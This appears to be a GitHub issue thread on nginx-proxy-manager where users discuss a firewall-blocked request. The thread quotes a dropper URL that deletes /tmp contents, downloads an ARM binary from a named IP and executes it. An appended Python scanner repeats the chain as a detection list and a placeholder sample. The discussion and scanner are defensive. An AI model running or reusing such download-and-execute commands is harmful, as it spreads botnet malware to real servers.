Malware Sites access from Nginx Proxy Manager #465
Comments
This is a shell script in the URL which tries to do the following commands: cd /tmp;
Ok - what's the purpose of this command, what is it looking to get from the URL...
Get and install malware on the webserver.
@jc21 - for real?
I just switched to TygerCaddy, almost similar or better functionality, since I was not sure what was going on. Also, if you like to manage Nginx with a little more technical knowledge you can also try The Perfect Reverse Proxy.
Can anyone confirm this? I'm monitoring my system, and not seeing this at all... doesn't mean it's not there... but not seeing this request.
Just to confirm, this does not happen every day; if I remember right I see this every week or 2 weeks. I can submit the detailed logs from my firewall (untangle) if anyone is investigating. I switched because I did not see a response on this topic for almost a month.
I do not see this entry on my systems (running nginx-proxy-manager). This looks like a typical exploit attempt, which may be automated (so you are not a direct intended target and just got caught in it) or manual (somebody is trying to actively hack you). Web servers receive attacks like this one on a daily basis, regretfully. I do not see why nginx-proxy-manager would do this by itself. I mean, the source code is public :-)
It sounds like I need to be clearer on what NPM does. It merely writes configuration files for Nginx to (mainly) forward web requests. These files are visible on disk for anyone to observe. It does not control the traffic before it arrives, in this case an attempt to install malware on your server. Nor does it execute any server side code outside of its own admin interface API. However, since nginx is just forwarding requests to your upstream host, your host might be susceptible to this attack; and that's out of NPM's control. You said your firewall blocked this incoming request, good! That's its job.
@dgraziotin - I never doubted that it's an intended exploit, could have been a Nginx bug or anything. I was using this for over a month after reporting this and I did not see another attempt. @jc21 - yeah, that's my understanding of how NPM works; however, the only issue I saw was that the traffic was originating from the box running NPM, not the other way round.
@geek-baba - when you say "box", are you referring to the docker container, or do you have other files and apps on the "box", if you're referring to the machine? Do you have other docker containers on the machine, running other apps and services?
@alderson59 - it's a VM running just docker and NPM.
Can someone help? I keep getting this error: [9/19/2020] [7:36:32 PM] [Global ] › ✖ error getaddrinfo ENOTFOUND lu
Is it possible that this issue is fixed?
Is this still an issue?
Not really, it's the service that's facing the internet and you see the attack from time to time.
As this is no (longer) an issue, I will close this.
What firewall do you use?
If requests like these in fact originate from the machine running your npm instance, your machine is already compromised and part of a bot-net trying to infect more machines. You should wipe your server and set it up again, since you can't know where the malware is hiding. Make sure you harden your server, like allowing only public/private key authentication to connect via ssh, or at the very least use a secure password that was randomly generated. Also disable the root login via ssh. There are a lot of blog posts and guides out there on how to harden your server.
I am not very sure what category I should put this into, but my firewall is blocking traffic from Nginx Proxy Manager that is trying to access the following site:
http://[37.49.224.183:80]/shell?cd+/tmp;rm+-rf+*;wget+37.49.224.183/YaO2uFOvUG8LV1y5NY1aCHmr1WdBLjcjiVD6aRRAWDL6oNY29J88y0nrXxaHBmTLEYC9yB56gBn95pco8kCbldVsHmjNQk8JTaC/Meth.arm7;chmod+777+/tmp/Meth.arm7;sh+/tmp/Meth.arm7+jaws.selfrep
Any insight into this?
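One way to look for this pattern in your own logs, and to tell an inbound probe from the "your box is already compromised" case where the request leaves from a host inside your network, as an added example that is not part of the original issue or of nginx-proxy-manager (the log line format, the addresses and the file name in the sample are constructed placeholders, not the values from the report):

```python
"""Flag requests matching the download-and-run chain quoted in this issue
(a /shell? query built from cd /tmp; rm -rf; wget; chmod; sh).
Constructed log format: "<ts> src=<ip> dst=<ip> url=<url>", one request per line."""
import ipaddress
import re
from urllib.parse import unquote_plus

# Stages of the dropper chain from the report; a hit needs several of them at once.
STAGE_MARKERS = ("cd /tmp", "rm -rf", "wget", "chmod", "sh /tmp")

LOG_LINE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) url=(?P<url>\S+)$")

def decode_query(url):
    """Return the query string of a URL with URL encoding undone ('+' -> space)."""
    _, _, query = url.partition("?")
    return unquote_plus(query)

def suspicious_stages(url):
    """List the chain markers present in the decoded query, in chain order."""
    cmd = decode_query(url)
    return [m for m in STAGE_MARKERS if m in cmd]

def scan(lines, min_stages=3):
    """Return (ts, src, dst, stages, from_inside) for lines with >= min_stages markers.
    from_inside is True when src is a private address (src is assumed to be an IP):
    an outbound hit from your own network means that host is compromised, not probed."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        stages = suspicious_stages(m["url"])
        if len(stages) >= min_stages:
            from_inside = ipaddress.ip_address(m["src"]).is_private
            hits.append((m["ts"], m["src"], m["dst"], stages, from_inside))
    return hits

# Constructed sample: a benign request, then one mirroring the reported URL shape with
# placeholder host 203.0.113.5 and placeholder file name instead of the real values.
SAMPLE = [
    "2020-09-01T10:00:00Z src=10.0.0.5 dst=93.184.216.34 url=http://example.com/index.html",
    "2020-09-01T10:00:01Z src=10.0.0.5 dst=203.0.113.5 url=http://203.0.113.5:80/shell?"
    "cd+/tmp;rm+-rf+*;wget+203.0.113.5/x/DROPPER.arm7;chmod+777+/tmp/DROPPER.arm7;sh+/tmp/DROPPER.arm7+selfrep",
]

if __name__ == "__main__":
    for ts, src, dst, stages, from_inside in scan(SAMPLE):
        origin = "outbound from inside (host compromised)" if from_inside else "inbound probe"
        print(f"{ts} {src} -> {dst}: {origin}; stages: {', '.join(stages)}")
```

A hit whose source is one of your own hosts is the situation described in the last comment of this thread, where the fix is to rebuild the machine rather than to block the destination.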